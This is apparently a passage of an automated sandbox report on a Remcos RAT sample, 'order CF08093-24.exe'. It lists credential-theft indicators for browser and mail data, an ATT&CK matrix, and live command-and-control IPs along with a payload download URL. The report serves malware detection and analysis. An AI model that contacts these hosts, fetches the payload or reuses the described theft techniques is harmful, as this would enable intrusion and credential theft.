              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_235F2264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword11_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword11_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword11_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2072, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter              		Logon Script (Windows)412
              Process Injection              		1
              Software Packing              		1
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares11
              Input Capture              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              DLL Side-Loading              		NTDS27
              System Information Discovery              		Distributed Component Object Model2
              Clipboard Data              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets141
              Security Software Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572358 Sample: order CF08093-24.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 47 geoplugin.net 2->47 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus detection for URL or domain 2->53 55 13 other signatures 2->55 9 order CF08093-24.exe 23 2->9         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\Servicerende.Gal55, Unicode 9->35 dropped 67 Suspicious powershell command line found 9->67 13 powershell.exe 30 9->13         started        signatures6 process7 file8 37 C:\Users\user\...\order CF08093-24.exe, PE32 13->37 dropped 39 C:\...\order CF08093-24.exe:Zone.Identifier, ASCII 13->39 dropped 69 Early bird code injection technique detected 13->69 71 Writes to foreign memory regions 13->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 13->73 75 3 other signatures 13->75 17 msiexec.exe 3 15 13->17         started        22 conhost.exe 13->22         started        signatures9 process10 dnsIp11 41 212.162.149.91, 2404, 49933, 49939 UNREAL-SERVERSUS Netherlands 17->41 43 212.162.149.89, 49922, 80 UNREAL-SERVERSUS Netherlands 17->43 45 geoplugin.net 178.237.33.50, 49940, 80 ATOM86-ASATOM86NL Netherlands 17->45 33 C:\ProgramData\remcos\logs.dat, data 17->33 dropped 57 Detected Remcos RAT 17->57 59 Tries to steal Mail credentials (via file registry) 17->59 61 Maps a DLL or memory area into another process 17->61 63 Installs a global keyboard hook 17->63 24 msiexec.exe 14 17->24         started        27 msiexec.exe 1 17->27         started        29 msiexec.exe 1 17->29         started        31 3 other processes 17->31 file12 signatures13 process14 signatures15 65 Tries to harvest and steal browser information (history, passwords, etc) 24->65

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              order CF08093-24.exe13%ReversingLabs
              order CF08093-24.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe13%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://212.162.149.89/xONeIbG151.bintA0%Avira URL Cloudsafe
              http://crl.micro?U0%Avira URL Cloudsafe
              http://212.162.149.89/xONeIbG151.bin0050%Avira URL Cloudsafe
              http://crl.microzE0%Avira URL Cloudsafe
              http://212.162.149.89/xONeIbG151.binA0%Avira URL Cloudsafe
              https://login.live.cD0%Avira URL Cloudsafe
              http://www.microsoft.cNU0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              http://212.162.149.89/xONeIbG151.bin100%Avira URL Cloudmalware
              http://www.ebuddy.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  		high
                  http://212.162.149.89/xONeIbG151.binfalse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.micro?Upowershell.exe, 00000002.00000002.3115887918.00000000071C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.imvu.comrmsiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://login.limsiexec.exe, 0000000A.00000002.3297767350.000000000293C000.00000004.00000010.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.imvu.commsiexec.exe, msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://geoplugin.net/json.gp?lmsiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.nirsoft.netmsiexec.exe, 0000000A.00000002.3297790419.000000000296F000.00000004.00000010.00020000.00000000.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrororder CF08093-24.exe, order CF08093-24.exe.2.drfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://212.162.149.89/xONeIbG151.bintAmsiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.commsiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://crl.micropowershell.exe, 00000002.00000002.3110396387.0000000002D08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://212.162.149.89/xONeIbG151.binAmsiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://login.live.cDmsiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.microsoft.cNUpowershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                            		high
                                                            https://login.yahoo.com/config/loginmsiexec.exefalse
                                                              		high
                                                              http://geoplugin.net/json.gpdKmsiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://212.162.149.89/xONeIbG151.bin005msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.nirsoft.net/msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.imvu.comatamsiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.microzEpowershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://geoplugin.net/json.gphymKmsiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://geoplugin.net/json.gpIKmsiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          212.162.149.91
                                                                          		unknownNetherlands
                                                                          		64236UNREAL-SERVERSUStrue
                                                                          212.162.149.89
                                                                          		unknownNetherlands
                                                                          		64236UNREAL-SERVERSUSfalse
                                                                          178.237.33.50
                                                                          		geoplugin.netNetherlands
                                                                          		8455ATOM86-ASATOM86NLfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1572358
                                                                          Start date and time:2024-12-10 13:50:06 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 9m 30s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:13
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:order CF08093-24.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@18/17@1/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 83.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 97%
                                                                          • Number of executed functions: 176
                                                                          • Number of non-executed functions: 295
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 4956 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
